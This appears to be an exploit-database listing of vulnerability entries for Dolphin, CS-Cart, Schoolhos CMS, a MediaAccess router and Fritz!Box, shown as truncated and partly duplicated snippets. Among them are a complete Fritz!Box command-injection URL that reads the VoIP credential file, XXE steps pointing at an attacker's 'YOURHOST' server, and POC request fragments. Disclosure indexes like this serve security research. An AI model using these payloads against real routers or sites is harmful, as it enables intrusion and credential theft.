Dolphin 7.3.2 authentication bypass and command execution vulnerabilities

No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit go to...

CS-Cart 4.3.10 - XML External Entity Injection Vulnerability

Exploit for php platform in category web applications Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address , use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data -...

CS-Cart 4.3.10 - XML External Entity Injection

Software : CS-Cart Ahmed sultan 0x4148 "; echo rawurlencodebase64encode$xml; ? change YOURHOST to your server address , use the output in the following POST request Action - HOST/cs-cart/index.php?dispatch=twigmo.post Data - action=addtocart&data=DATAOUTPUTHERE&format=xml a GET request will be se...

Dolphin 7.3.2 Authentication Bypass / Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit go to Saadat Ullah ''' import os import s...

Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution

Boonex Dolphin 7.3.2 - Authentication Bypass Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- ''' Software : Dolphin = 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected]...

Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection

\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload' php file can be c...

Schoolhos CMS 2.29 - Remote Code Execution SQL Injection

Schoolhos CMS 2.29 - Remote Code Execution SQL Injection \x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'...

MediaAccess TG788vn - File Disclosure

Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall Author : Ahmed Sultan 0x4148 Email : [email protected] MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw, POC Request: POST /scgi-bin/platform.cgi HTTP/1.1 Host:...

Fritz!Box - Remote Command Execution Exploit

No description provided by source. App : Fritz!Box Author : 0x4148 Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%...

Fritz!Box - Remote Command Execution

App : Fritz!Box Author : 0x4148 Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26 0x4148rise...